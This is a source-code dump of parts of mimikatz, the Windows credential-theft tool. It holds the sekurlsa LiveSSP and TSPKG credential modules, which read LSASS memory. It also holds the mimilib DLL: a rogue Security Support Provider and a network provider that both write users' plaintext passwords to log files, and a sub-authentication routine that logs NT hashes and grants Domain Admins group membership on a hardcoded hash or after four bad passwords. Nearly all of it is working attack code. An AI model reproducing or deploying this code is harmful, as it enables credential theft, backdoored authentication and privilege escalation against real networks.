23 | const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_single_package[] = {&kuhl_m_sekurlsa_livessp_package};
24 |
25 | NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[])
26 | {
27 | return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_livessp_single_package, 1);
28 | }
29 |
30 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
31 | {
32 | KIWI_LIVESSP_LIST_ENTRY credentials;
33 | KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
34 | KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
35 |
36 | if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, ARRAYSIZE(LiveReferences), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL, NULL))
37 | {
38 | aLsassMemory.address = LiveGlobalLogonSessionList;
39 | if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
40 | {
41 | if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_LIST_ENTRY)))
42 | {
43 | if(aLsassMemory.address = credentials.suppCreds)
44 | {
45 | aLocalMemory.address = &primaryCredential;
46 | if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)))
47 | kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData, (pData->cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT);
48 | }
49 | }
50 | }
51 | } else kprintf(L"KO");
52 | }
53 | #endif
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_sekurlsa.h"
8 | #if !defined(_M_ARM64)
9 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package;
10 |
11 | NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[]);
12 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
13 |
14 | typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
15 | {
16 | ULONG isSupp;
17 | ULONG unk0;
18 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
19 | } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
20 |
21 | typedef struct _KIWI_LIVESSP_LIST_ENTRY
22 | {
23 | struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
24 | struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
25 | PVOID unk0;
26 | PVOID unk1;
27 | PVOID unk2;
28 | PVOID unk3;
29 | DWORD unk4;
30 | DWORD unk5;
31 | PVOID unk6;
32 | LUID LocallyUniqueIdentifier;
33 | LSA_UNICODE_STRING UserName;
34 | PVOID unk7;
35 | PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
36 | } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
37 | #endif
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_sekurlsa.h"
8 |
9 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package;
10 |
11 | NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[]);
12 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
13 |
14 | typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY {
15 | struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink;
16 | struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Blink;
17 | ULONG References;
18 | ULONG CredentialReferences;
19 | LUID LogonId;
20 | ULONG unk0;
21 | ULONG unk1;
22 | ULONG unk2;
23 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
24 | } KIWI_SSP_CREDENTIAL_LIST_ENTRY, *PKIWI_SSP_CREDENTIAL_LIST_ENTRY;
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_sekurlsa.h"
8 |
9 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package;
10 |
11 | NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[]);
12 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
13 |
14 | typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
15 | PVOID unk0; // lock ?
16 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
17 | } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
18 |
19 | typedef struct _KIWI_TS_CREDENTIAL {
20 | #if defined(_M_X64) || defined(_M_ARM64)
21 | BYTE unk0[108];
22 | #elif defined(_M_IX86)
23 | BYTE unk0[64];
24 | #endif
25 | LUID LocallyUniqueIdentifier;
26 | PVOID unk1;
27 | PVOID unk2;
28 | PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
29 | } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
30 |
31 | typedef struct _KIWI_TS_CREDENTIAL_1607 {
32 | #if defined(_M_X64) || defined(_M_ARM64)
33 | BYTE unk0[112];
34 | #elif defined(_M_IX86)
35 | BYTE unk0[68];
36 | #endif
37 | LUID LocallyUniqueIdentifier;
38 | PVOID unk1;
39 | PVOID unk2;
40 | PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
41 | } KIWI_TS_CREDENTIAL_1607, *PKIWI_TS_CREDENTIAL_1607;
42 |
43 | typedef struct _KIWI_TS_CREDENTIAL_HELPER {
44 | LONG offsetToLuid;
45 | LONG offsetToTsPrimary;
46 | } KIWI_TS_CREDENTIAL_HELPER, *PKIWI_TS_CREDENTIAL_HELPER;
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_sekurlsa.h"
8 |
9 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package;
10 |
11 | NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[]);
12 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
13 |
14 | typedef struct _KIWI_WDIGEST_LIST_ENTRY {
15 | struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
16 | struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
17 | ULONG UsageCount;
18 | struct _KIWI_WDIGEST_LIST_ENTRY *This;
19 | LUID LocallyUniqueIdentifier;
20 | } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
--------------------------------------------------------------------------------
/mimilib/kappfree.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "utils.h"
7 |
8 | void CALLBACK kappfree_startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
9 | {
10 | HANDLE monToken, monSuperToken;
11 | PROCESS_INFORMATION mesInfosProcess;
12 | STARTUPINFO mesInfosDemarrer;
13 |
14 | RtlZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION));
15 | RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO));
16 | mesInfosDemarrer.cb = sizeof(STARTUPINFO);
17 |
18 | if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY, &monToken))
19 | {
20 | if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken))
21 | {
22 | if(CreateProcessAsUser(monSuperToken, NULL, lpszCmdLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess))
23 | {
24 | CloseHandle(mesInfosProcess.hThread);
25 | CloseHandle(mesInfosProcess.hProcess);
26 | }
27 | CloseHandle(monSuperToken);
28 | }
29 | CloseHandle(monToken);
30 | }
31 | }
--------------------------------------------------------------------------------
/mimilib/kdhcp.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kdhcp.h"
7 |
8 | HMODULE kdhcp_nextLibrary = NULL;
9 | LPDHCP_NEWPKT kdhcp_nextLibraryCalloutNewPkt = NULL;
10 |
11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
12 | {
13 | if((ul_reason_for_call == DLL_PROCESS_DETACH) && kdhcp_nextLibrary)
14 | FreeLibrary(kdhcp_nextLibrary);
15 | return TRUE;
16 | }
17 |
18 | DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl)
19 | {
20 | LPDHCP_ENTRY_POINT_FUNC nextEntry;
21 | RtlZeroMemory(CalloutTbl, sizeof(DHCP_CALLOUT_TABLE));
22 |
23 | if(ChainDlls)
24 | if(kdhcp_nextLibrary = LoadLibrary(ChainDlls))
25 | if(nextEntry = (LPDHCP_ENTRY_POINT_FUNC) GetProcAddress(kdhcp_nextLibrary, DHCP_CALLOUT_ENTRY_POINT))
26 | nextEntry(ChainDlls + lstrlenW(ChainDlls) + 1, CalloutVersion, CalloutTbl);
27 |
28 | if(CalloutTbl->DhcpNewPktHook)
29 | kdhcp_nextLibraryCalloutNewPkt = CalloutTbl->DhcpNewPktHook;
30 | CalloutTbl->DhcpNewPktHook = kdhcp_DhcpNewPktHook;
31 |
32 | return ERROR_SUCCESS;
33 | }
34 |
35 | const BYTE macToBlack[][MAC_ADDRESS_SIZE] = {
36 | {0x00, 0x0c, 0x29, 0x00, 0x00, 0x00},
37 | {0x00, 0x50, 0x56, 0x00, 0x00, 0x00}
38 | };
39 | DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt)
40 | {
41 | DWORD status = ERROR_SUCCESS, m;
42 | *ProcessIt = TRUE;
43 |
44 | for(m = 0; m < ARRAYSIZE(macToBlack); m++)
45 | {
46 | if(RtlEqualMemory(*Packet + MAC_SOURCE_ADDRESS_OFFSET, macToBlack[m], MAC_ADDRESS_SIZE / 2)) // just the start of the address
47 | {
48 | *ProcessIt = FALSE;
49 | status = DHCP_DROP_INVALID;
50 | break;
51 | }
52 | }
53 | if(kdhcp_nextLibraryCalloutNewPkt && *ProcessIt)
54 | status = kdhcp_nextLibraryCalloutNewPkt(Packet, PacketSize, IpAddress, Reserved, PktContext, ProcessIt);
55 | return status;
56 | }
--------------------------------------------------------------------------------
/mimilib/kdhcp.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "utils.h"
7 | #include <dhcpssdk.h>
8 |
9 | #define MAC_ADDRESS_SIZE 6
10 | #define MAC_SOURCE_ADDRESS_OFFSET 28
11 |
12 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
13 | DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl);
14 | DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt);
--------------------------------------------------------------------------------
/mimilib/kdns.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kdns.h"
7 |
8 | DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
9 | {
10 | return ERROR_SUCCESS;
11 | }
12 |
13 | DWORD WINAPI kdns_DnsPluginCleanup()
14 | {
15 | return ERROR_SUCCESS;
16 | }
17 |
18 | DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
19 | {
20 | FILE * kdns_logfile;
21 | #pragma warning(push)
22 | #pragma warning(disable:4996)
23 | if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
24 | #pragma warning(pop)
25 | {
26 | klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
27 | fclose(kdns_logfile);
28 | }
29 | return ERROR_SUCCESS;
30 | }
--------------------------------------------------------------------------------
/mimilib/kdns.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "utils.h"
8 |
9 | #define PLUGIN_ALLOCATOR_FUNCTION PVOID
10 | #define PLUGIN_FREE_FUNCTION PVOID
11 | #define PDB_RECORD PVOID
12 |
13 | DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction);
14 | DWORD WINAPI kdns_DnsPluginCleanup();
15 | DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead);
16 | // DnsPluginQuery2
17 | // DnsPluginQueryZoneScope
18 | // DnsPluginQueryServerScope
19 | // DnsPluginQueryCacheScope
--------------------------------------------------------------------------------
/mimilib/kfilt.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "utils.h"
8 |
9 | //typedef enum _DELTA_OPERATION_TYPE {
10 | // DeltaOperationCreateInDomain = 1,
11 | // DeltaOperationSetInformation_a = 2,
12 | // DeltaOperationDelete = 3,
13 | // DeltaOperationAddMemberTo = 4,
14 | // DeltaOperation_unknown5 = 5,
15 | // DeltaOperationRemoveMemberFrom = 6,
16 | // DeltaOperationSetInformation_b = 7,
17 | // DeltaOperationPassword = 8,
18 | //} DELTA_OPERATION_TYPE, *PDELTA_OPERATION_TYPE;
19 | //
20 | //typedef enum _DELTA_CATEGORY_TYPE {
21 | // DeltaCategoryDomain = 1,
22 | // DeltaCategoryUser = 2,
23 | // DeltaCategoryGroup = 3,
24 | // DeltaCategoryAlias = 4,
25 | //} DELTA_CATEGORY_TYPE, *PDELTA_CATEGORY_TYPE;
26 | //
27 | //typedef struct _DELTA_OPERATION_PASSWORD {
28 | // DWORD unk0;
29 | // UNICODE_STRING UserName;
30 | // UNICODE_STRING description;
31 | // UNICODE_STRING FullName;
32 | // DWORD unk1;
33 | // DWORD PrimaryGroupId;
34 | // DWORD unk3;
35 | // UNICODE_STRING Password;
36 | // DWORD RelativeId;
37 | // DWORD unk4;
38 | // DWORD unk5;
39 | // DWORD unk6; // 10002h
40 | //} DELTA_OPERATION_PASSWORD, *PDELTA_OPERATION_PASSWORD;
41 | //
42 | //typedef struct _DELTA_OPERATION_DELETE {
43 | // UNICODE_STRING Name;
44 | // PVOID unk0;
45 | // PVOID unk1;
46 | // DWORD RelativeId;
47 | //} DELTA_OPERATION_DELETE, *PDELTA_OPERATION_DELETE;
48 | //
49 | //typedef struct _DELTA_OPERATION_ADD_REMOVE_MEMBER {
50 | // PSID pSid;
51 | // DWORD RelativeId;
52 | // /**/
53 | //} DELTA_OPERATION_ADD_REMOVE_MEMBER, *PDELTA_OPERATION_ADD_REMOVE_MEMBER;
54 | //
55 | //typedef struct _DELTA_OPERATION_DATA {
56 | // union {
57 | // DELTA_OPERATION_PASSWORD opPassword;
58 | // DELTA_OPERATION_ADD_REMOVE_MEMBER opMember;
59 | // DELTA_OPERATION_DELETE opDelete;
60 | // };
61 | //} DELTA_OPERATION_DATA, *PDELTA_OPERATION_DATA;
62 |
63 | BOOLEAN NTAPI kfilt_InitializeChangeNotify(void);
64 | NTSTATUS NTAPI kfilt_PasswordChangeNotify(PUNICODE_STRING UserName, ULONG RelativeId, PUNICODE_STRING NewPassword);
65 | //NTSTATUS NTAPI kfilt_DeltaNotify(PSID pSid, DELTA_OPERATION_TYPE operation, DELTA_CATEGORY_TYPE category, ULONG RelativeId, PVOID data5, PDWORD a6, PDELTA_OPERATION_DATA data7);
--------------------------------------------------------------------------------
/mimilib/knp.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "knp.h"
7 |
8 | DWORD WINAPI knp_NPLogonNotify(PLUID lpLogonId, LPCWSTR lpAuthentInfoType, LPVOID lpAuthentInfo, LPCWSTR lpPreviousAuthentInfoType, LPVOID lpPreviousAuthentInfo, LPWSTR lpStationName, LPVOID StationHandle, LPWSTR *lpLogonScript)
9 | {
10 | FILE *knp_logfile;
11 | #pragma warning(push)
12 | #pragma warning(disable:4996)
13 | if(knp_logfile = _wfopen(L"kiwinp.log", L"a"))
14 | #pragma warning(pop)
15 | { // MSV1_0_INTERACTIVE_LOGON ~= KERB_INTERACTIVE_LOGON
16 | klog(knp_logfile, L"[%08x:%08x] %s %wZ\\%wZ\t", lpLogonId->HighPart, lpLogonId->LowPart, lpAuthentInfoType, &((PMSV1_0_INTERACTIVE_LOGON) lpAuthentInfo)->LogonDomainName, &((PMSV1_0_INTERACTIVE_LOGON) lpAuthentInfo)->UserName);
17 | klog_password(knp_logfile, &((PMSV1_0_INTERACTIVE_LOGON) lpAuthentInfo)->Password);
18 | klog(knp_logfile, L"\n");
19 | fclose(knp_logfile);
20 | }
21 | *lpLogonScript = NULL;
22 | return WN_SUCCESS;
23 | }
24 |
25 | DWORD WINAPI knp_NPGetCaps(DWORD nIndex)
26 | {
27 | DWORD dwRes;
28 | switch (nIndex)
29 | {
30 | case WNNC_NET_TYPE:
31 | dwRes = WNNC_CRED_MANAGER;
32 | break;
33 | case WNNC_SPEC_VERSION:
34 | dwRes = WNNC_SPEC_VERSION51;
35 | break;
36 | case WNNC_START:
37 | dwRes = WNNC_WAIT_FOR_START;
38 | break;
39 | default:
40 | dwRes = 0;
41 | break;
42 | }
43 | return dwRes;
44 | }
--------------------------------------------------------------------------------
/mimilib/knp.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "utils.h"
8 | #include <npapi.h>
9 |
10 | DWORD WINAPI knp_NPLogonNotify(PLUID lpLogonId, LPCWSTR lpAuthentInfoType, LPVOID lpAuthentInfo, LPCWSTR lpPreviousAuthentInfoType, LPVOID lpPreviousAuthentInfo, LPWSTR lpStationName, LPVOID StationHandle, LPWSTR *lpLogonScript);
11 | DWORD WINAPI knp_NPGetCaps(DWORD nIndex);
--------------------------------------------------------------------------------
/mimilib/kssp.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kssp.h"
7 |
8 | static SECPKG_FUNCTION_TABLE kiwissp_SecPkgFunctionTable[] = {
9 | {
10 | NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
11 | kssp_SpInitialize, kssp_SpShutDown, kssp_SpGetInfo, kssp_SpAcceptCredentials,
12 | NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
13 | NULL, NULL, NULL, NULL, NULL, NULL, NULL
14 | }
15 | };
16 |
17 | NTSTATUS NTAPI kssp_SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS Parameters, PLSA_SECPKG_FUNCTION_TABLE FunctionTable)
18 | {
19 | return STATUS_SUCCESS;
20 | }
21 |
22 | NTSTATUS NTAPI kssp_SpShutDown(void)
23 | {
24 | return STATUS_SUCCESS;
25 | }
26 |
27 | NTSTATUS NTAPI kssp_SpGetInfo(PSecPkgInfoW PackageInfo)
28 | {
29 | PackageInfo->fCapabilities = SECPKG_FLAG_ACCEPT_WIN32_NAME | SECPKG_FLAG_CONNECTION;
30 | PackageInfo->wVersion = 1;
31 | PackageInfo->wRPCID = SECPKG_ID_NONE;
32 | PackageInfo->cbMaxToken = 0;
33 | PackageInfo->Name = L"KiwiSSP";
34 | PackageInfo->Comment = L"Kiwi Security Support Provider";
35 | return STATUS_SUCCESS;
36 | }
37 |
38 | NTSTATUS NTAPI kssp_SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, PUNICODE_STRING AccountName, PSECPKG_PRIMARY_CRED PrimaryCredentials, PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials)
39 | {
40 | FILE *kssp_logfile;
41 | #pragma warning(push)
42 | #pragma warning(disable:4996)
43 | if(kssp_logfile = _wfopen(L"kiwissp.log", L"a"))
44 | #pragma warning(pop)
45 | {
46 | klog(kssp_logfile, L"[%08x:%08x] [%08x] %wZ\\%wZ (%wZ)\t", PrimaryCredentials->LogonId.HighPart, PrimaryCredentials->LogonId.LowPart, LogonType, &PrimaryCredentials->DomainName, &PrimaryCredentials->DownlevelName, AccountName);
47 | klog_password(kssp_logfile, &PrimaryCredentials->Password);
48 | klog(kssp_logfile, L"\n");
49 | fclose(kssp_logfile);
50 | }
51 | return STATUS_SUCCESS;
52 | }
53 |
54 | NTSTATUS NTAPI kssp_SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion, PSECPKG_FUNCTION_TABLE *ppTables, PULONG pcTables)
55 | {
56 | *PackageVersion = SECPKG_INTERFACE_VERSION;
57 | *ppTables = kiwissp_SecPkgFunctionTable;
58 | *pcTables = ARRAYSIZE(kiwissp_SecPkgFunctionTable);
59 | return STATUS_SUCCESS;
60 | }
--------------------------------------------------------------------------------
/mimilib/kssp.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "utils.h"
8 | #include <sspi.h>
9 | #include <ntsecpkg.h>
10 |
11 | NTSTATUS NTAPI kssp_SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion, PSECPKG_FUNCTION_TABLE *ppTables, PULONG pcTables);
12 | NTSTATUS NTAPI kssp_SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS Parameters, PLSA_SECPKG_FUNCTION_TABLE FunctionTable);
13 | NTSTATUS NTAPI kssp_SpGetInfo(PSecPkgInfoW PackageInfo);
14 | NTSTATUS NTAPI kssp_SpShutDown(void);
15 | NTSTATUS NTAPI kssp_SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, PUNICODE_STRING AccountName, PSECPKG_PRIMARY_CRED PrimaryCredentials, PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials);
--------------------------------------------------------------------------------
/mimilib/ksub.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 |
5 | Vincent LE TOUX
6 | http://pingcastle.com / http://mysmartlogon.com
7 | vincent.letoux@gmail.com
8 |
9 | Licence : https://creativecommons.org/licenses/by/4.0/
10 | */
11 | #include "ksub.h"
12 |
13 | const BYTE myHash[LM_NTLM_HASH_LENGTH] = {0xea, 0x37, 0x0c, 0xb7, 0xb9, 0x44, 0x70, 0x2c, 0x09, 0x68, 0x30, 0xdf, 0xc3, 0x53, 0xe7, 0x02}; // Waza1234/admin
14 | NTSTATUS NTAPI ksub_Msv1_0SubAuthenticationRoutine(IN NETLOGON_LOGON_INFO_CLASS LogonLevel, IN PVOID LogonInformation, IN ULONG Flags, IN PUSER_ALL_INFORMATION UserAll, OUT PULONG WhichFields, OUT PULONG UserFlags, OUT PBOOLEAN Authoritative, OUT PLARGE_INTEGER LogoffTime, OUT PLARGE_INTEGER KickoffTime)
15 | {
16 | FILE *ksub_logfile;;
17 | #pragma warning(push)
18 | #pragma warning(disable:4996)
19 | if(ksub_logfile = _wfopen(L"kiwisub.log", L"a"))
20 | #pragma warning(pop)
21 | {
22 | klog(ksub_logfile, L"%u (%u) - %wZ\\%wZ (%wZ) (%hu) ", UserAll->UserId, UserAll->PrimaryGroupId, &((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)->LogonDomainName, &((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)->UserName, &((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)->Workstation, UserAll->BadPasswordCount);
23 | if(UserAll->NtPasswordPresent)
24 | klog_hash(ksub_logfile, &UserAll->NtPassword, FALSE);
25 | if((UserAll->BadPasswordCount == 4) || (UserAll->NtPasswordPresent && RtlEqualMemory(UserAll->NtPassword.Buffer, myHash, min(sizeof(myHash), UserAll->NtPassword.Length))))
26 | {
27 | UserAll->PrimaryGroupId = 512;
28 | klog(ksub_logfile, L" :)\n");
29 | }
30 | else klog(ksub_logfile, L"\n");
31 | fclose(ksub_logfile);
32 | }
33 | *WhichFields = 0;
34 | *UserFlags = 0;
35 | *Authoritative = TRUE;
36 | LogoffTime->QuadPart = KickoffTime->QuadPart = 0x7fffffffffffffff;
37 | return STATUS_SUCCESS;
38 | }
--------------------------------------------------------------------------------
/mimilib/ksub.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 |
5 | Vincent LE TOUX
6 | http://pingcastle.com / http://mysmartlogon.com
7 | vincent.letoux@gmail.com
8 |
9 | Licence : https://creativecommons.org/licenses/by/4.0/
10 | */
11 | #pragma once
12 | #include "utils.h"
13 | #include <SubAuth.h>
14 |
15 | NTSTATUS NTAPI ksub_Msv1_0SubAuthenticationRoutine(IN NETLOGON_LOGON_INFO_CLASS LogonLevel, IN PVOID LogonInformation, IN ULONG Flags, IN PUSER_ALL_INFORMATION UserAll, OUT PULONG WhichFields, OUT PULONG UserFlags, OUT PBOOLEAN Authoritative, OUT PLARGE_INTEGER LogoffTime, OUT PLARGE_INTEGER KickoffTime);
--------------------------------------------------------------------------------
/mimilib/mimilib.def:
--------------------------------------------------------------------------------
1 | LIBRARY
2 | EXPORTS
3 | startW = kappfree_startW
4 |
5 | SpLsaModeInitialize = kssp_SpLsaModeInitialize
6 |
7 | InitializeChangeNotify = kfilt_InitializeChangeNotify
8 | PasswordChangeNotify = kfilt_PasswordChangeNotify
9 |
10 | WinDbgExtensionDllInit = kdbg_WinDbgExtensionDllInit
11 | ExtensionApiVersion = kdbg_ExtensionApiVersion
12 | coffee = kdbg_coffee
13 | mimikatz = kdbg_mimikatz
14 |
15 | DnsPluginInitialize = kdns_DnsPluginInitialize
16 | DnsPluginCleanup = kdns_DnsPluginCleanup
